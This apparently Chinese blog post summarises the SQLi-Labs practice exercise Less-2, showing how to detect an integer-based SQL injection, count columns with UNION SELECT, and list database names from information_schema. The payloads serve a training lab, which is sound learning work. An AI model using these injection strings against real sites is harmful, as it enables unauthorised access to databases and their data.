SQLi-Labs 练习总结 Page-1 Less-2

Less-2 GET-Error based-Intiger based

图片0.png

1.试探,判断注入类型

输入id=1'

图片1.png

根据回显near '' LIMIT 0,1' at line 1,判断是个数字型注入。
可以成功注入的有:

2.判断字段数量

?id=-1 union select 1,2…… --+

通过增加select后面的数字个数,判断字段数量。若数量不对,返回:

图片2.png

知道页面显示正常,这里字段数是3,却能显示的是第2,3字段。

图片2-2.png

3.数据库

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
图3

后续部分同 Less-1,没有差别。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • SQLi-Labs 练习总结 Page-1 Less-1
    SQLi-LABS 练习总结 Page-1 基础练习 写在前面:SQL注入是一个需要不断尝试的过程,其中可能出现很...
    xaviershun阅读 578评论 1 0
  • Java初级面试题
    1. Java基础部分 基础部分的顺序:基本语法,类相关的语法,内部类的语法,继承相关的语法,异常的语法,线程的语...
    子非鱼_t_阅读 31,765评论 18 399
  • 第97篇、感恩父母和大地的馈赠
    今天,随着我单位的专家去了一家护理院。看到一些老人躺在病床上,生不如死!有的没有知觉,有的皮肤溃烂,有的老年痴呆!...
    天使小鱼儿阅读 334评论 4 6
  • 所想
    有很多难以言喻的东西在夜深的时候就会侵染并弥漫开,我不喜欢繁重冗杂的辞藻,戳痛心扉的言语是致命的毒药。
    是你_好巧噢阅读 128评论 0 0
  • 了解自己
    有时候了解自己是从朋友口中得知,可能每一个人都没有那么清楚自己,面对这样的人生活,是该舍还是得,终究是个难题,明天...
    黎子多多阅读 156评论 0 0